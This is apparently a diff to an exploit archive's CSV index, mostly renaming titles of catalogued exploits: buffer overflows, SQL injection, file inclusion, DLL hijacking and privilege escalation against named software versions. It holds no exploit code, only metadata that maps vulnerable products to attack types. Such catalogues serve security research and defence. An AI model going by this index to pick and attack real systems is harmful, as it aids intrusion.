12326,platforms/windows/local/12326.py,"ZipGenius 6.3.1.2552 - 'zgtips.dll' Stack Buffer Overflow",2010-04-21,corelanc0d3r,windows,local,0
@ -6388,7 +6388,7 @@ id,file,description,date,author,platform,type,port
14029,platforms/windows/local/14029.py,"NO-IP.com Dynamic DNS Update Client 2.2.1 - 'Request' Insecure Encoding Algorithm",2010-06-24,sinn3r,windows,local,0
14044,platforms/windows/local/14044.pl,"WM Downloader 2.9.2 - Stack Buffer Overflow",2010-06-25,Madjix,windows,local,0
14046,platforms/windows/local/14046.py,"FieldNotes 32 5.0 - Buffer Overflow (SEH)",2010-06-25,TecR0c,windows,local,0
14068,platforms/windows/local/14068.py,"Winamp 5.572 - Local Buffer Overflow (Windows 7 ASLR + DEP Bypass)",2010-06-26,Node,windows,local,0
14068,platforms/windows/local/14068.py,"Winamp 5.572 (Windows 7) - Local Buffer Overflow (ASLR + DEP Bypass)",2010-06-26,Node,windows,local,0
14077,platforms/windows/local/14077.rb,"BlazeDVD 6.0 - Buffer Overflow (Metasploit)",2010-06-27,blake,windows,local,0
14081,platforms/windows/local/14081.pl,"RM Downloader 3.1.3 - Buffer Overflow (SEH)",2010-06-27,Madjix,windows,local,0
14098,platforms/windows/local/14098.py,"GSM SIM Utility 5.15 - sms file Local Buffer Overflow (SEH)",2010-06-28,chap0,windows,local,0
@ -6484,7 +6484,7 @@ id,file,description,date,author,platform,type,port
14786,platforms/windows/local/14786.c,"CorelDRAW X3 13.0.0.576 - 'crlrib.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0
14787,platforms/windows/local/14787.c,"Corel PHOTO-PAINT X3 13.0.0.576 - 'crlrib.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0
14788,platforms/windows/local/14788.c,"Media Player Classic 6.4.9.1 - 'iacenc.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0
14789,platforms/windows/local/14789.c,"Nullsoft Winamp 5.581 - 'wnaspi32.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0
14789,platforms/windows/local/14789.c,"NullSoft Winamp 5.581 - 'wnaspi32.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0
14790,platforms/windows/local/14790.c,"Google Earth 5.1.3535.3218 - 'quserex.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0
14791,platforms/windows/local/14791.c,"Daemon Tools Lite - 'mfc80loc.dll' DLL Hijacking",2010-08-25,"Mohamed Clay",windows,local,0
14793,platforms/windows/local/14793.c,"Autodesk AutoCAD 2007 - 'color.dll' DLL Hijacking",2010-08-25,"xsploited security",windows,local,0
@ -7954,7 +7954,7 @@ id,file,description,date,author,platform,type,port
27609,platforms/windows/local/27609.rb,"Chasys Draw IES - Buffer Overflow (Metasploit)",2013-08-15,Metasploit,windows,local,0
27766,platforms/linux/local/27766.txt,"Linux Kernel 2.6.x - SMBFS CHRoot Security Restriction Bypass",2006-04-28,"Marcel Holtmann",linux,local,0
27769,platforms/linux/local/27769.txt,"Linux Kernel 2.6.x - CIFS CHRoot Security Restriction Bypass",2006-04-28,"Marcel Holtmann",linux,local,0
27874,platforms/windows/local/27874.py,"WinAmp 5.63 - (winamp.ini) Local Exploit",2013-08-26,"Ayman Sagy",windows,local,0
27874,platforms/windows/local/27874.py,"Winamp 5.63 - 'winamp.ini' Local Exploit",2013-08-26,"Ayman Sagy",windows,local,0
27938,platforms/linux/local/27938.rb,"VMware - Setuid VMware-mount Unsafe popen(3)",2013-08-29,Metasploit,linux,local,0
27944,platforms/osx/local/27944.rb,"Apple Mac OSX - Sudo Password Bypass (Metasploit)",2013-08-29,Metasploit,osx,local,0
27965,platforms/osx/local/27965.py,"Apple Mac OSX 10.8.4 - Privilege Escalation (Python)",2013-08-30,"David Kennedy (ReL1K)",osx,local,0
@ -7986,7 +7986,7 @@ id,file,description,date,author,platform,type,port
28955,platforms/windows/local/28955.py,"Internet Haut Debit Mobile PCW_MATMARV1.0.0B03 - Buffer Overflow (SEH)",2013-10-14,metacom,windows,local,0
28969,platforms/windows/local/28969.py,"Beetel Connection Manager PCW_BTLINDV1.0.0B04 - Buffer Overflow (SEH)",2013-10-15,metacom,windows,local,0
28984,platforms/hp-ux/local/28984.pl,"HP Tru64 4.0/5.1 - POSIX Threads Library Privilege Escalation",2006-11-13,"Adriel T. Desautels",hp-ux,local,0
40768,platforms/linux/local/40768.sh,"Nginx (Debian-Based Distributions) - 'logrotate' Local Privilege Escalation",2016-11-16,legalhackers,linux,local,0
40768,platforms/linux/local/40768.sh,"Nginx (Debian-Based Distributions) - 'logrotate' Local Privilege Escalation",2016-11-16,"Dawid Golunski",linux,local,0
29069,platforms/windows/local/29069.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxfw.sys' Privilege Escalation",2006-11-16,"Ruben Santamarta",windows,local,0
29070,platforms/windows/local/29070.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxstart.sys' Privilege Escalation",2006-11-16,"Ruben Santamarta",windows,local,0
29102,platforms/openbsd/local/29102.c,"OpenBSD 3.9/4.0 - ld.so Local Environment Variable Clearing",2006-11-20,"Mark Dowd",openbsd,local,0
@ -11199,8 +11199,8 @@ id,file,description,date,author,platform,type,port
19094,platforms/windows/remote/19094.txt,"Microsoft Internet Explorer 4/5 - DHTML Edit ActiveX Control File Stealing and Cross Frame Access",1999-04-22,"Georgi Guninsky",windows,remote,0
19096,platforms/linux/remote/19096.c,"RedHat Linux 5.1 & Caldera OpenLinux Standard 1.2 - Mountd",1998-08-28,LucySoft,linux,remote,0
19099,platforms/hardware/remote/19099.rb,"F5 BIG-IP - SSH Private Key Exposure (Metasploit)",2012-06-13,Metasploit,hardware,remote,0
19101,platforms/unix/remote/19101.c,"Xi Graphics Maximum CDE 1.2.3 / TriTeal TED CDE 4.3 / Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (1)",1998-08-31,"NAI research team",unix,remote,0
19102,platforms/unix/remote/19102.c,"Xi Graphics Maximum CDE 1.2.3 / TriTeal TED CDE 4.3 / Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (2)",1998-08-31,"NAI research team",unix,remote,0
19101,platforms/unix/remote/19101.c,"Xi Graphics Maximum CDE 1.2.3/TriTeal TED CDE 4.3/Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (1)",1998-08-31,"NAI research team",unix,remote,0
19102,platforms/unix/remote/19102.c,"Xi Graphics Maximum CDE 1.2.3/TriTeal TED CDE 4.3/Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (2)",1998-08-31,"NAI research team",unix,remote,0
19103,platforms/linux/remote/19103.c,"HP HP-UX 10.34 / Microsoft Windows 95/NT 3.5.1 SP1/NT 3.5.1 SP2/NT 3.5.1 SP3/NT 3.5.1 SP4/NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3 - Denial of Service",1997-11-13,"G P R",linux,remote,0
40434,platforms/php/remote/40434.rb,"FreePBX < 13.0.188 - Remote Command Execution (Metasploit)",2016-09-27,0x4148,php,remote,0
19104,platforms/linux/remote/19104.c,"IBM AIX 3.2/4.1 & SCO Unixware 7.1.1 & SGI IRIX 5.3 & Sun Solaris 2.5.1 - Exploit",1997-11-24,anonymous,linux,remote,0
@ -11856,7 +11856,7 @@ id,file,description,date,author,platform,type,port
20817,platforms/windows/remote/20817.c,"Microsoft IIS 5.0 - '.printer' ISAPI Extension Buffer Overflow (3)",2005-02-02,styx,windows,remote,0
20818,platforms/windows/remote/20818.txt,"Microsoft IIS 5.0 - '.printer' ISAPI Extension Buffer Overflow (4)",2001-05-01,"Cyrus The Great",windows,remote,0
20819,platforms/windows/remote/20819.txt,"BRS Webweaver 0.x - FTP Root Full Path Disclosure",2001-04-28,joetesta,windows,remote,0
20820,platforms/windows/remote/20820.c,"Nullsoft Winamp 2.x - AIP Buffer Overflow",2001-04-29,byterage,windows,remote,0
20820,platforms/windows/remote/20820.c,"NullSoft Winamp 2.x - AIP Buffer Overflow",2001-04-29,byterage,windows,remote,0
20825,platforms/windows/remote/20825.txt,"Michael Lamont Savant HTTP Server 2.1 - Directory Traversal",2001-02-17,"Tom Tom",windows,remote,0
20826,platforms/windows/remote/20826.txt,"Jason Rahaim MP3Mystic 1.0.x - Server Directory Traversal",2001-05-07,neme-dhc,windows,remote,0
20829,platforms/windows/remote/20829.txt,"T. Hauck Jana Server 1.45/1.46 - Hex Encoded Directory Traversal",2001-05-07,neme-dhc,windows,remote,0
@ -12968,7 +12968,7 @@ id,file,description,date,author,platform,type,port
24557,platforms/windows/remote/24557.py,"Sami FTP Server 2.0.1 - LIST Command Buffer Overflow",2013-03-01,superkojiman,windows,remote,0
24567,platforms/multiple/remote/24567.txt,"Oracle Database Server 8.1.7/9.0.x - ctxsys.driload Access Validation",2004-09-03,"Alexander Kornbrust",multiple,remote,0
24568,platforms/windows/remote/24568.html,"Grokster 1.3/2.6 / KaZaA Media Desktop 1.3.x/1.6.1/2.0.x - ActiveX Control Remote Buffer Overflow",2004-09-03,celebrityhacker,windows,remote,0
24571,platforms/windows/remote/24571.html,"Nullsoft Winamp 2.x/3.x/5.0.x - ActiveX Control Remote Buffer Overflow",2004-09-03,celebrityhacker,windows,remote,0
24571,platforms/windows/remote/24571.html,"NullSoft Winamp 2.x/3.x/5.0.x - ActiveX Control Remote Buffer Overflow",2004-09-03,celebrityhacker,windows,remote,0
24572,platforms/windows/remote/24572.pl,"Ipswitch WhatsUp Gold 7.0/8.0 - Notification Instance Name Remote Buffer Overflow",2004-09-03,anonymous,windows,remote,0
24720,platforms/windows/remote/24720.txt,"Microsoft Internet Explorer 6 - IFRAME Status Bar URI Obfuscation",2004-11-02,"Benjamin Tobias Franz",windows,remote,0
24581,platforms/multiple/remote/24581.txt,"SAFE TEAM Regulus 2.2 - Staffile Information Disclosure",2004-09-07,masud_libra,multiple,remote,0
@ -13071,7 +13071,7 @@ id,file,description,date,author,platform,type,port
25190,platforms/multiple/remote/25190.txt,"ca3de - Multiple Vulnerabilities",2005-03-03,"Luigi Auriemma",multiple,remote,0
25191,platforms/multiple/remote/25191.txt,"JoWood Chaser 1.0/1.50 - Remote Buffer Overflow",2005-03-07,"Luigi Auriemma",multiple,remote,0
25194,platforms/windows/remote/25194.txt,"Hosting Controller 1.x/6.1 - Multiple Information Disclosure Vulnerabilities",2005-03-07,"small mouse",windows,remote,0
29277,platforms/windows/remote/29277.txt,"winamp Web interface 7.5.13 - Multiple Vulnerabilities",2006-12-11,"Luigi Auriemma",windows,remote,0
29277,platforms/windows/remote/29277.txt,"Winamp Web interface 7.5.13 - Multiple Vulnerabilities",2006-12-11,"Luigi Auriemma",windows,remote,0
24999,platforms/windows/remote/24999.py,"Light HTTPD 0.1 (Windows) - Buffer Overflow",2013-04-25,"Jacob Holcomb",windows,remote,0
25294,platforms/windows/remote/25294.rb,"Microsoft Internet Explorer - CGenericElement Object Use-After-Free (Metasploit)",2013-05-07,Metasploit,windows,remote,0
25001,platforms/linux/remote/25001.rb,"GroundWork - monarch_scan.cgi OS Command Injection (Metasploit)",2013-04-25,Metasploit,linux,remote,0
@ -13234,7 +13234,7 @@ id,file,description,date,author,platform,type,port
25986,platforms/php/remote/25986.txt,"Plesk < 9.5.4 - Remote Exploit",2013-06-05,kingcope,php,remote,0
25987,platforms/hardware/remote/25987.txt,"Xpient - Cash Drawer Operation",2013-06-05,"Core Security",hardware,remote,0
25988,platforms/multiple/remote/25988.txt,"Oracle9i Application Server 9.0.2 - MOD_ORADAV Access Control",2003-02-13,"David Litchfield",multiple,remote,0
25989,platforms/windows/remote/25989.txt,"Nullsoft Winamp 5.0 - Malformed ID3v2 Tag Buffer Overflow",2005-07-15,"Leon Juranic",windows,remote,0
25989,platforms/windows/remote/25989.txt,"NullSoft Winamp 5.0 - Malformed ID3v2 Tag Buffer Overflow",2005-07-15,"Leon Juranic",windows,remote,0
25999,platforms/windows/remote/25999.rb,"Microsoft Internet Explorer - textNode Use-After-Free (Metasploit)",2013-06-07,"Scott Bell",windows,remote,0
26002,platforms/multiple/remote/26002.txt,"Oracle Reports Server 6.0.8/9.0.x - XML File Disclosure",2005-07-19,"Alexander Kornbrust",multiple,remote,0
26003,platforms/multiple/remote/26003.txt,"Oracle Reports Server 6.0.8/9.0.x - Arbitrary File Disclosure",2005-07-19,"Alexander Kornbrust",multiple,remote,0
@ -17705,7 +17705,7 @@ id,file,description,date,author,platform,type,port
4238,platforms/php/webapps/4238.txt,"Adult Directory - 'cat_id' SQL Injection",2007-07-27,t0pP8uZz,php,webapps,0
4239,platforms/asp/webapps/4239.txt,"SimpleBlog 3.0 - (comments_get.asp id) SQL Injection",2007-07-28,g00ns,asp,webapps,0
4241,platforms/php/webapps/4241.txt,"PHP123 Top Sites - 'category.php cat' SQL Injection",2007-07-28,t0pP8uZz,php,webapps,0
4242,platforms/php/webapps/4242.php,"LinPHA 1.3.1 - (new_images.php) Blind SQL Injection",2007-07-29,EgiX,php,webapps,0
4242,platforms/php/webapps/4242.php,"LinPHA 1.3.1 - 'new_images.php' Blind SQL Injection",2007-07-29,EgiX,php,webapps,0
4246,platforms/php/webapps/4246.txt,"wolioCMS - Authentication Bypass / SQL Injection",2007-07-30,k1tk4t,php,webapps,0
4248,platforms/php/webapps/4248.txt,"Joomla! Component com_gmaps 1.00 - (mapId) SQL Injection",2007-07-31,"Mehmet Ince",php,webapps,0
4253,platforms/php/webapps/4253.pl,"paBugs 2.0 Beta 3 - (main.php cid) SQL Injection",2007-08-02,uimp,php,webapps,0
@ -17782,7 +17782,7 @@ id,file,description,date,author,platform,type,port
4395,platforms/php/webapps/4395.txt,"NuclearBB Alpha 2 - 'ROOT_PATH' Remote File Inclusion",2007-09-11,"Rootshell Security",php,webapps,0
4396,platforms/php/webapps/4396.txt,"X-Cart - Multiple Remote File Inclusion",2007-09-11,aLiiF,php,webapps,0
4397,platforms/php/webapps/4397.rb,"WordPress 1.5.1.1 <= 2.2.2 - Multiple Vulnerabilities",2007-09-14,"Lance M. Havok",php,webapps,0
4400,platforms/php/webapps/4400.txt,"KwsPHP Module jeuxflash 1.0 - 'id' SQL Injection",2007-09-13,Houssamix,php,webapps,0
4400,platforms/php/webapps/4400.txt,"KwsPHP Module jeuxflash 1.0 - 'id' Parameter SQL Injection",2007-09-13,Houssamix,php,webapps,0
4401,platforms/php/webapps/4401.txt,"Joomla! Component Joomlaradio 5.0 - Remote File Inclusion",2007-09-13,Morgan,php,webapps,0
4404,platforms/php/webapps/4404.txt,"GForge < 4.6b2 - (skill_delete) SQL Injection",2007-09-13,"Sumit Siddharth",php,webapps,0
4405,platforms/php/webapps/4405.txt,"Ajax File Browser 3b - (settings.inc.php approot) Remote File Inclusion",2007-09-14,"arfis project",php,webapps,0
@ -17872,7 +17872,7 @@ id,file,description,date,author,platform,type,port
4519,platforms/php/webapps/4519.txt,"Pindorama 0.1 - client.php Remote File Inclusion",2007-10-11,S.W.A.T.,php,webapps,0
4520,platforms/php/webapps/4520.txt,"PicoFlat CMS 0.4.14 - 'index.php' Remote File Inclusion",2007-10-11,0in,php,webapps,0
4521,platforms/php/webapps/4521.txt,"Joomla! Component Flash uploader 2.5.1 - Remote File Inclusion",2007-10-11,mdx,php,webapps,0
4523,platforms/php/webapps/4523.pl,"KwsPHP 1.0 - Newsletter Module SQL Injection",2007-10-11,s4mi,php,webapps,0
4523,platforms/php/webapps/4523.pl,"KwsPHP 1.0 Module Newsletter - SQL Injection",2007-10-11,s4mi,php,webapps,0
4524,platforms/php/webapps/4524.txt,"Joomla! Component com_colorlab 1.0 - Remote File Inclusion",2007-10-12,"Mehmet Ince",php,webapps,0
4525,platforms/php/webapps/4525.pl,"TikiWiki 1.9.8 - 'tiki-graph_formula.php' Command Execution",2007-10-12,str0ke,php,webapps,0
4527,platforms/php/webapps/4527.txt,"Softbiz Recipes Portal Script - SQL Injection",2007-10-13,"Khashayar Fereidani",php,webapps,0
@ -18453,45 +18453,45 @@ id,file,description,date,author,platform,type,port
5339,platforms/php/webapps/5339.php,"Nuked-klaN 1.7.6 - Multiple Vulnerabilities",2008-04-01,"Charles Fol",php,webapps,0
5340,platforms/php/webapps/5340.txt,"RunCMS Module bamagalerie3 - SQL Injection",2008-04-01,DreamTurk,php,webapps,0
5345,platforms/php/webapps/5345.txt,"Joomla! Component OnlineFlashQuiz 1.0.2 - Remote File Inclusion",2008-04-02,NoGe,php,webapps,0
5347,platforms/php/webapps/5347.txt,"DaZPHP 0.1 - (prefixdir) Local File Inclusion",2008-04-02,w0cker,php,webapps,0
5348,platforms/php/webapps/5348.txt,"PhpBlock a8.4 - (PATH_TO_CODE) Remote File Inclusion",2008-04-02,w0cker,php,webapps,0
5350,platforms/php/webapps/5350.txt,"KwsPHP Module Galerie - (id_gal) SQL Injection",2008-04-03,S@BUN,php,webapps,0
5351,platforms/php/webapps/5351.txt,"KwsPHP Module Archives - 'id' SQL Injection",2008-04-03,S@BUN,php,webapps,0
5352,platforms/php/webapps/5352.txt,"KwsPHP Module jeuxflash (cat) 1.0 - SQL Injection",2008-04-03,Houssamix,php,webapps,0
5353,platforms/php/webapps/5353.txt,"KwsPHP Module ConcoursPhoto - (C_ID) SQL Injection",2008-04-03,Stack,php,webapps,0
5358,platforms/php/webapps/5358.pl,"XPOZE Pro 3.05 - (reed) SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0
5359,platforms/php/webapps/5359.txt,"Vastal I-Tech Software Zone - 'cat_id' SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0
5360,platforms/php/webapps/5360.txt,"sabros.us 1.75 - (thumbnails.php) Remote File Disclosure",2008-04-04,HaCkeR_EgY,php,webapps,0
5362,platforms/php/webapps/5362.txt,"Comdev News Publisher - SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0
5363,platforms/php/webapps/5363.txt,"Affiliate Directory - 'cat_id' SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0
5364,platforms/php/webapps/5364.txt,"PHP Photo Gallery 1.0 - (photo_id) SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0
5365,platforms/php/webapps/5365.txt,"Blogator-script 0.95 - (incl_page) Remote File Inclusion",2008-04-04,JIKO,php,webapps,0
5367,platforms/php/webapps/5367.pl,"PIGMy-SQL 1.4.1 - (getdata.php id) Blind SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0
5368,platforms/php/webapps/5368.txt,"Blogator-script 0.95 - (id_art) SQL Injection",2008-04-04,"Virangar Security",php,webapps,0
5369,platforms/php/webapps/5369.txt,"Dragoon 0.1 - (lng) Local File Inclusion",2008-04-04,w0cker,php,webapps,0
5347,platforms/php/webapps/5347.txt,"DaZPHP 0.1 - 'prefixdir' Parameter Local File Inclusion",2008-04-02,w0cker,php,webapps,0
5348,platforms/php/webapps/5348.txt,"PhpBlock a8.4 - 'PATH_TO_CODE' Parameter Remote File Inclusion",2008-04-02,w0cker,php,webapps,0
5350,platforms/php/webapps/5350.txt,"KwsPHP 1.3.456 Module Galerie - 'id_gal' Parameter SQL Injection",2008-04-03,S@BUN,php,webapps,0
5351,platforms/php/webapps/5351.txt,"KwsPHP 1.3.456 Module Archives - 'id' Parameter SQL Injection",2008-04-03,S@BUN,php,webapps,0
5352,platforms/php/webapps/5352.txt,"KwsPHP Module jeuxflash 1.0 - 'cat' Parameter SQL Injection",2008-04-03,Houssamix,php,webapps,0
5353,platforms/php/webapps/5353.txt,"KwsPHP Module ConcoursPhoto 2.0 - 'C_ID' Parameter SQL Injection",2008-04-03,Stack,php,webapps,0
5358,platforms/php/webapps/5358.pl,"XPOZE Pro 3.05 - 'reed' Parameter SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0
5359,platforms/php/webapps/5359.txt,"Vastal I-Tech Software Zone - 'cat_id' Parameter SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0
5360,platforms/php/webapps/5360.txt,"Sabros.us 1.75 - 'thumbnails.php' Remote File Disclosure",2008-04-04,HaCkeR_EgY,php,webapps,0
5362,platforms/php/webapps/5362.txt,"Comdev News Publisher 4.1.2 - SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0
5363,platforms/php/webapps/5363.txt,"Affiliate Directory - 'cat_id' Parameter SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0
5364,platforms/php/webapps/5364.txt,"PHP Photo Gallery 1.0 - 'photo_id' Parameter SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0
5365,platforms/php/webapps/5365.txt,"Blogator-script 0.95 - 'incl_page' Parameter Remote File Inclusion",2008-04-04,JIKO,php,webapps,0
5367,platforms/php/webapps/5367.pl,"PIGMy-SQL 1.4.1 - 'getdata.php' Blind SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0
5368,platforms/php/webapps/5368.txt,"Blogator-script 0.95 - 'id_art' Parameter SQL Injection",2008-04-04,"Virangar Security",php,webapps,0
5369,platforms/php/webapps/5369.txt,"Dragoon 0.1 - 'lng' Parameter Local File Inclusion",2008-04-04,w0cker,php,webapps,0
5370,platforms/php/webapps/5370.txt,"Blogator-script 0.95 - Change User Password",2008-04-05,"Virangar Security",php,webapps,0
5371,platforms/php/webapps/5371.txt,"Entertainment Directory 1.1 - SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0
5372,platforms/php/webapps/5372.txt,"Easynet Forum Host - 'forum.php forum' SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0
5373,platforms/asp/webapps/5373.txt,"CoBaLT 0.1 - Multiple SQL Injections",2008-04-05,U238,asp,webapps,0
5374,platforms/php/webapps/5374.txt,"Gaming Directory 1.0 - 'cat_id' SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0
5372,platforms/php/webapps/5372.txt,"Easynet Forum Host - 'forum.php' SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0
5373,platforms/asp/webapps/5373.txt,"Cobalt 0.1 - Multiple SQL Injections",2008-04-05,U238,asp,webapps,0
5374,platforms/php/webapps/5374.txt,"Gaming Directory 1.0 - 'cat_id' Parameter SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0
5375,platforms/php/webapps/5375.txt,"visualpic 0.3.1 - Remote File Inclusion",2008-04-05,Cr@zy_King,php,webapps,0
5376,platforms/php/webapps/5376.pl,"Picture Rating 1.0 - Blind SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0
5377,platforms/php/webapps/5377.txt,"Links Directory 1.1 - 'cat_id' SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0
5378,platforms/php/webapps/5378.txt,"Software Index 1.1 - 'cid' SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0
5377,platforms/php/webapps/5377.txt,"Links Directory 1.1 - 'cat_id' Parameter SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0
5378,platforms/php/webapps/5378.txt,"Software Index 1.1 - 'cid' Parameter SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0
5379,platforms/php/webapps/5379.txt,"MyBB Plugin Custom Pages 1.0 - SQL Injection",2008-04-06,Lidloses_Auge,php,webapps,0
5380,platforms/php/webapps/5380.txt,"Blog PixelMotion - 'sauvBase.php' Arbitrary Database Backup",2008-04-06,JIKO,php,webapps,0
5381,platforms/php/webapps/5381.txt,"Blog PixelMotion - 'modif_config.php' Arbitrary File Upload",2008-04-06,JIKO,php,webapps,0
5382,platforms/php/webapps/5382.txt,"Blog PixelMotion - 'index.php categorie' SQL Injection",2008-04-06,parad0x,php,webapps,0
5383,platforms/php/webapps/5383.txt,"Site Sift Listings - 'id' SQL Injection",2008-04-06,S@BUN,php,webapps,0
5382,platforms/php/webapps/5382.txt,"Blog PixelMotion - 'categorie' Parameter SQL Injection",2008-04-06,parad0x,php,webapps,0
5383,platforms/php/webapps/5383.txt,"Site Sift Listings - 'id' Parameter SQL Injection",2008-04-06,S@BUN,php,webapps,0
5384,platforms/php/webapps/5384.txt,"Prozilla Top 100 1.2 - Arbitrary Delete Stats",2008-04-06,t0pP8uZz,php,webapps,0
5385,platforms/php/webapps/5385.txt,"Prozilla Forum Service - 'forum.php forum' SQL Injection",2008-04-06,t0pP8uZz,php,webapps,0
5385,platforms/php/webapps/5385.txt,"Prozilla Forum Service - 'forum' Parameter SQL Injection",2008-04-06,t0pP8uZz,php,webapps,0
5387,platforms/php/webapps/5387.txt,"Prozilla Reviews Script 1.0 - Arbitrary Delete User",2008-04-06,t0pP8uZz,php,webapps,0
5388,platforms/php/webapps/5388.txt,"Prozilla Topsites 1.0 - Arbitrary Edit/Add Users",2008-04-06,t0pP8uZz,php,webapps,0
5389,platforms/php/webapps/5389.txt,"Prozilla Cheat Script 2.0 - 'id' SQL Injection",2008-04-06,t0pP8uZz,php,webapps,0
5390,platforms/php/webapps/5390.txt,"Prozilla Freelancers - (project) SQL Injection",2008-04-07,t0pP8uZz,php,webapps,0
5390,platforms/php/webapps/5390.txt,"Prozilla Freelancers - 'project' Parameter SQL Injection",2008-04-07,t0pP8uZz,php,webapps,0
5391,platforms/php/webapps/5391.php,"Drake CMS 0.4.11 - Blind SQL Injection",2008-04-07,EgiX,php,webapps,0
5392,platforms/php/webapps/5392.php,"LinPHA 1.3.3 - (maps plugin) Remote Command Execution",2008-04-07,EgiX,php,webapps,0
5393,platforms/php/webapps/5393.txt,"Dragoon 0.1 - (root) Remote File Inclusion",2008-04-07,RoMaNcYxHaCkEr,php,webapps,0
5392,platforms/php/webapps/5392.php,"LinPHA 1.3.3 Plugin Maps - Remote Command Execution",2008-04-07,EgiX,php,webapps,0
5393,platforms/php/webapps/5393.txt,"Dragoon 0.1 - 'root' Parameter Remote File Inclusion",2008-04-07,RoMaNcYxHaCkEr,php,webapps,0
5394,platforms/php/webapps/5394.txt,"Mole 2.1.0 - (viewsource.php) Remote File Disclosure",2008-04-07,GoLd_M,php,webapps,0
5399,platforms/php/webapps/5399.txt,"ChartDirector 4.1 - (viewsource.php) File Disclosure",2008-04-07,Stack,php,webapps,0
5400,platforms/php/webapps/5400.txt,"724CMS 4.01 Enterprise - (index.php ID) SQL Injection",2008-04-07,Lidloses_Auge,php,webapps,0
@ -19153,7 +19153,7 @@ id,file,description,date,author,platform,type,port
6189,platforms/php/webapps/6189.txt,"GreenCart PHP Shopping Cart - 'id' SQL Injection",2008-08-01,"Hussin X",php,webapps,0
6190,platforms/php/webapps/6190.txt,"phsBlog 0.1.1 - Multiple SQL Injections",2008-08-01,cOndemned,php,webapps,0
6191,platforms/php/webapps/6191.txt,"e-vision CMS 2.02 - (SQL Injection / Arbitrary File Upload / Information Gathering) Multiple Vulnerabilities",2008-08-02,"Khashayar Fereidani",php,webapps,0
6192,platforms/php/webapps/6192.txt,"k-links directory - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-08-02,Corwin,php,webapps,0
6192,platforms/php/webapps/6192.txt,"k-links directory - SQL Injection / Cross-Site Scripting",2008-08-02,Corwin,php,webapps,0
6193,platforms/php/webapps/6193.txt,"E-Store Kit-1 <= 2 PayPal Edition - 'pid' SQL Injection",2008-08-02,Mr.SQL,php,webapps,0
6194,platforms/php/webapps/6194.pl,"moziloCMS 1.10.1 - 'download.php' Arbitrary Download File Exploit",2008-08-02,Ams,php,webapps,0
6199,platforms/php/webapps/6199.pl,"Joomla! Component EZ Store Remote - Blind SQL Injection",2008-08-03,His0k4,php,webapps,0
@ -19193,7 +19193,7 @@ id,file,description,date,author,platform,type,port
6260,platforms/php/webapps/6260.txt,"cyberBB 0.6 - Multiple SQL Injections",2008-08-18,cOndemned,php,webapps,0
6261,platforms/php/webapps/6261.txt,"PHP live helper 2.0.1 - Multiple Vulnerabilities",2008-08-18,"GulfTech Security",php,webapps,0
6269,platforms/cgi/webapps/6269.txt,"TWiki 4.2.0 - (configure) Remote File Disclosure",2008-08-19,Th1nk3r,cgi,webapps,0
6270,platforms/php/webapps/6270.txt,"SFS Affiliate Directory - 'id' SQL Injection",2008-08-19,"Hussin X",php,webapps,0
6270,platforms/php/webapps/6270.txt,"Affiliate Directory - 'id' Parameter SQL Injection",2008-08-19,"Hussin X",php,webapps,0
6271,platforms/php/webapps/6271.txt,"Ad Board - 'id' SQL Injection",2008-08-19,"Hussin X",php,webapps,0
6273,platforms/php/webapps/6273.txt,"SunShop 4.1.4 - 'id' SQL Injection",2008-08-19,"GulfTech Security",php,webapps,0
6276,platforms/php/webapps/6276.txt,"Banner Management Script - 'tr.php id' SQL Injection",2008-08-19,S.W.A.T.,php,webapps,0
@ -19648,7 +19648,7 @@ id,file,description,date,author,platform,type,port
6891,platforms/php/webapps/6891.txt,"Absolute Form Processor 4.0 - Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0
6892,platforms/php/webapps/6892.txt,"Absolute Live Support 5.1 - Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0
6893,platforms/php/webapps/6893.txt,"Absolute Control Panel XE 1.5 - Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0
6894,platforms/php/webapps/6894.txt,"SFS EZ Gaming Directory - 'Directory.php id' SQL Injection",2008-10-31,Hurley,php,webapps,0
6894,platforms/php/webapps/6894.txt,"SFS EZ Gaming Directory - 'directory.php' SQL Injection",2008-10-31,Hurley,php,webapps,0
6895,platforms/php/webapps/6895.txt,"SFS EZ Adult Directory - 'Directory.php id' SQL Injection",2008-10-31,Hurley,php,webapps,0
6896,platforms/php/webapps/6896.txt,"Logz podcast CMS 1.3.1 - (add_url.php art) SQL Injection",2008-10-31,ZoRLu,php,webapps,0
6897,platforms/php/webapps/6897.txt,"cpanel 11.x - Cross-Site Scripting / Local File Inclusion",2008-10-31,"Khashayar Fereidani",php,webapps,0
@ -19659,7 +19659,7 @@ id,file,description,date,author,platform,type,port
